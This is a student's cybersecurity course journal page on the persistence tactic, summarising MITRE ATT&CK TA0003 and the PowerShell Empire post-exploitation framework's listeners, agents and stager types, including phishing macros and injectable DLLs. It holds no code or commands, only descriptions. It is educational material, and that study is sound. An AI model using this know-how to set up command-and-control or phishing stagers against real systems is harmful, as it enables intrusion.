10 Class 27: Learning Journal - VascoLucas01/cybersecurity-reading-notes GitHub Wiki

Introduction

[Date: 2023/06/19]

In this Class 27: Learning Journal, I am going to talk about the main ideas/concepts covered in the persistence lecture.

Today I Learned

Persistence

TA0003: Persistence

Persistence is a tactic in which the adversary attempts to maintain their foothold (access) on the targeted network.

  • TA0003 in MITRE ATT&CK
  • Techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access
  • Access, action, or configuration changes that let then maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code.

PowerShell Empire

Isn't Empire retired?

  • Infamous for its use by nation-state APTs
  • Encrypted C2 (Command&Control) traffic
  • Popular post-exploitation framework

PowerShell Empire is a pure PowerShell post-exploitation agent built on cryptographically-secure communications and a flexible architecture.

  • Similar to Metasploit framework, Empire sought to draw attention to the potential for PowerShell to be weaponized
  • Its original mission has since been fulfilled and it is no longer maintained by its authors as of 2019
  • However, we can use it in lab just fine as an offensive toolkit

What are the important componenets of Empire?

  • A listener is a process that runs on the C2 server and awaits connection requests from compromised hosts. This allows STDOUT data to route back to the C2 server's shell so the attacker can see what's happening
  • An agent is a program that maintains a connection between C2 and the compromised host
  • A stager is a snippet of code that allows malicious code to be run via the agent on the compromised host.

Stager types

  • The launcher stager (./lib/stagers/launcher.py) is a commonly-used stager module, and generates a one-liner stage0 launcher for an Empire agent
  • The launcher_bat stager (./lib/stagers/launcher_bat.py) generates a self-deleting .BAT file that executes a one-liner stage0 launcher for an Empire agent
  • The macrostager (./lib/stagers/macro.py) generates an office macro that launches an Empire stager. This macro can be embedded into any office document for the purposes of phising.
  • The dll stager (./lib/stagers/dll.py) generates a reflectively-injectable MSF-compliant .DLL that loads up the .NET runtime into a process and execute a download-cradle to stage an Empire agent. These .DLLs are the key to running Empire in a process that's not powershell.exe. Using these .DLLs with Metasploit is described here.

Modules execute malicious commands, which can harvest credentials and escalate privileges, etc. for the attacker